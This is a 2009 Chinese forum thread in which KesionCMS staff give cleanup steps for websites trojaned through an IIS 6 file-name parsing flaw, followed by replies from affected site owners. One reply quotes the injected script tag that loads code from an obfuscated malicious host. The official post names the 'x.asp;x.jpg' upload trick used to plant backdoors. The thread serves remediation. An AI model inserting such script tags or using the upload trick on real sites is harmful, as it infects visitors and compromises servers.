账号通
    

账号  

密码  

19305

查看

54

回复
主题:[公告]针对"一生有你"版主挂马处理方案的补充说明 [收藏主题] 转到:  
科汛官方 当前离线

47268

主题

145

广播

405

粉丝
添加关注
级别:管理员

用户积分:101604 分
登录次数:7935 次
注册时间:2006/12/7
最后登录:2023/12/14
科汛官方 发表于:2009/9/15 10:03:00   | 只看该作者 查看该作者主题 楼主 
做在线知识付费 选科汛云开店

每次我们得知服务器安全漏洞时,我们也尽量的让程序更安全并及时的出补丁,这次在得知iis 6存在这个漏洞后,我们也第一时间在(9-10)的v6 sp1上打上了这个安全补丁,但由于一些站长的疏忽,没来得及打V6 sp1补丁,导致这次的挂马事件确实比较严重,我们在此也深表谦意!

 

漏洞原理:http://www.hacksb.cn/post/88.html

解决方法:http://bbs.kesion.com/dispbbs.asp?boardid=44&Id=93161

 

 

一些站长补挂马后,不知所措!这里我主要是补充说明一种清除方法供参考:

1.进服务器删除以下文件夹admin,ks_inc,ks_editor,ks_cls,item,plus,js,club,ask,company,user,product,html及根目录下的文件如index.asp,map.asp,rss.asp,special.asp,SpecialIndex.asp,SpecialList.asp等(如有涉及到自己的文件请自行备份)这一步主要就是删除科汛的相关可能被挂马的系统文件

2.到uploadfiles目录下(主要会在uploadfiles/user目录下)找出类似x.asp;x.jpg格式的图片文件并删除(重要)

3.到模板目录template,清除相关被插入JS或iframe文件代码,如果你本机有备份template目录,那可以直接删除整个template目录

4.重新下载V6 sp1程序并将刚第一步删除的文件夹及文件上传到你的服务器!

5.最后如果你的站点有生成静态,到后台重新发布即可!

 

PS:请尽量按以上方法操作,最重要的是找出后门木马并删除!能删除的全部删除,然后重新上传新程序,重新生成操作,对剩余的文件要彻底排查。

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
tjecai 当前离线

52

主题

3

广播

0

粉丝
添加关注
级别:学前班

用户积分:168 分
登录次数:15 次
注册时间:2009/9/30
最后登录:2016/4/6
tjecai 发表于:2009/10/2 15:31:00   | 只看该作者 查看该作者主题 沙发 
科汛智能建站系统
我想问一下,数据库没事吧?不用删除吧?
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
laijunwen 当前离线

27

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:365 分
登录次数:16 次
注册时间:2009/3/22
最后登录:2009/11/29
laijunwen 发表于:2009/10/1 22:29:00   | 只看该作者 查看该作者主题 藤椅 

你好,我的站也是9月30号被挂上了一段代码。<script language="JavaScript" src="http://pt92%38.9966.org" type="text/javascript" id="scr7ipt1549"  ></script>就是这段代码。还有我发现1.我之前在我的空间放了几个不同的网站源码系统,我发现我其他的网站源码系统也被挂了这段代码。2.代码里的这个网址pt92%38.9966.org,不是固定的,有很多种网址,如:pt928.99%36%36.org还有我就没有打上来,因为实在太多了,用官方给我的“iframe批量替换工具”这个工具根本就搞不定,我想我的整个网站文件都被放了这个代码!  

 

    希望我的发现对官方有帮助!希望官方能尽快找出放马的人。。。

 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
huiten 当前离线

83

主题

12

广播

0

粉丝
添加关注
级别:学前班

用户积分:754 分
登录次数:269 次
注册时间:2009/7/26
最后登录:2024/3/30
huiten 发表于:2009/10/1 18:29:00   | 只看该作者 查看该作者主题 板凳 
科汛智能建站系统
<script src="/ks_inc/ajax.js"></script>
<!-- published at 2009-10-1 16:19:34 publish by KesionCMS V5.5 -->
这是不是木马或者是恶意代码啊
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
a8624172 当前离线

17

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:98 分
登录次数:3 次
注册时间:2009/9/28
最后登录:2012/10/5
a8624172 发表于:2009/9/28 2:27:00   | 只看该作者 查看该作者主题 报纸 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
ccf236 当前离线

19

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:171 分
登录次数:24 次
注册时间:2009/9/27
最后登录:2017/5/4
ccf236 发表于:2009/9/27 23:50:00   | 只看该作者 查看该作者主题 地板 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
joyo1984 当前离线

4

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:47 分
登录次数:2 次
注册时间:2009/9/21
最后登录:2009/9/21
joyo1984 发表于:2009/9/21 18:32:00   | 只看该作者 查看该作者主题 7楼 
科汛智能建站系统
对了,我还想问一下,sqlsever里也会被注入后门代码么?
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
joyo1984 当前离线

4

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:47 分
登录次数:2 次
注册时间:2009/9/21
最后登录:2009/9/21
joyo1984 发表于:2009/9/21 18:31:00   | 只看该作者 查看该作者主题 8楼 
科汛在线考试系统(NET)
呵呵,还好我把模版的文件夹设置成不可写入的了。要不还真挂上了。我的也被黑上了,不过,我把木马留着了,自己当防火墙用。放的超级深的目录。很好的木马,能看出我系统的漏洞,还有这个木马居然还有批量删除木马的功能,哈哈,强,编木马的考虑的还真周到啊
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
chixj 当前离线

29

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:292 分
登录次数:11 次
注册时间:2008/10/13
最后登录:2009/10/10
chixj 发表于:2009/9/18 10:39:00   | 只看该作者 查看该作者主题 9楼 
科汛在线商城系统(NET)
多谢官方的快速反应
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
ailan 当前离线

51

主题

0

广播

0

粉丝
添加关注
级别:学前班

用户积分:122 分
登录次数:22 次
注册时间:2009/9/17
最后登录:2010/7/4
ailan 发表于:2009/9/17 14:48:00   | 只看该作者 查看该作者主题 10楼 
 
  支持(0) | 反对(0) 回到顶部顶端 回到底部底部
<上一主题 | 下一主题 >
Powered By KesionCMS Version X1
厦门科汛软件有限公司 © 2006-2016 页面执行0.25098秒 powered by KesionCMS 9.0